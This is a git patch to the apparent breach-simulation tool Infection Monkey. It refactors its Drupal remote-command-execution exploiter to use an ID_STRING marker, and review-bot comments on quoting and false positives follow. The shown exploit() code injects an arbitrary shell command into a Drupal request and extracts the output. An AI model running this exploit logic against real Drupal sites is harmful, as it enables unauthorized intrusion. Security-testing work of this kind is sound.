From b82a6e48b285f8e0e3ecde79a3da3b3bd2d4ed52 Mon Sep 17 00:00:00 2001
From: ophirharpazg
Date: Mon, 31 Aug 2020 17:55:04 +0300
Subject: [PATCH] use ID_STRING instead of dashes
---
 monkey/infection_monkey/exploit/drupal.py | 11 ++++++-----
 1 file changed, 6 insertions(+), 5 deletions(-)
diff --git a/monkey/infection_monkey/exploit/drupal.py b/monkey/infection_monkey/exploit/drupal.py
index 06cd17e54..fa5222146 100644
--- a/monkey/infection_monkey/exploit/drupal.py
+++ b/monkey/infection_monkey/exploit/drupal.py
@@ -8,6 +8,7 @@ import logging
 import requests
 from urllib.parse import urljoin
 from infection_monkey.exploit.web_rce import WebRCE
+from infection_monkey.model import ID_STRING
 from network.network_utils import remove_port
 __author__ = 'Ophir Harpaz'
@@ -70,7 +71,7 @@ class DrupalExploiter(WebRCE):
 for node_id in node_ids:
 node_url = urljoin(url, str(node_id))
 if self.check_if_exploitable(node_url):
- self.add_vuln_url(url) # Where is this used?
+ self.add_vuln_url(url) # This is for report. Should be refactored in the future
 self.vulnerable_urls.append(node_url)
 if stop_checking:
 break
@@ -114,7 +115,7 @@ class DrupalExploiter(WebRCE):
 def exploit(self, url, command):
 # pad a easy search replace output:
- cmd = 'echo ---- && ' + command
+ cmd = f'echo {ID_STRING} && {command}'
 base = remove_port(url)
 payload = {
 "link": [
@@ -145,10 +146,10 @@ class DrupalExploiter(WebRCE):
 if check_drupal_cache(r):
 LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
- if '----' not in r.text:
- LOG.info('[warn] Command execution _may_ have failed')
+ if ID_STRING not in r.text:
+ LOG.warning('Command execution _may_ have failed')
- result = r.text.split('----')[-1]
+ result = r.text.split(ID_STRING)[-1]
 LOG.info(f'Drupal exploit result = {result}')
 return result
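Review bot: In the `-114,7 +115,7` hunk, `cmd = f'echo {ID_STRING} && {command}'` puts ID_STRING into a shell string unquoted, and the later `ID_STRING not in r.text` check only works if echo prints it back unchanged. ID_STRING is defined in infection_monkey.model and its value is not visible here, so this holds only as long as it contains no whitespace runs or shell metacharacters. The context comment above the line is also hard to parse; something like `# Prefix the output with ID_STRING (must be shell-safe) so the command output can be located in the HTTP response` would state both the purpose and the assumption. exploit() begins in this hunk and its body continues past it.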
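Review bot: In the `-145,10 +146,10` hunk, when ID_STRING is missing from `r.text` the code logs the warning but still falls through to `r.text.split(ID_STRING)[-1]`, which then yields the whole response body, so the caller and the `Drupal exploit result` log line receive a full page as if it were command output. Returning right after the warning (for example `return ''`) would keep a failed attempt from being reported as a result; which value the WebRCE caller treats as failure is not visible here, so that needs confirming. Separately, since the request itself carries ID_STRING, a response that merely reflects the submitted value would presumably pass this check without the command having run, which would put a false positive in the report. exploit() starts outside this hunk.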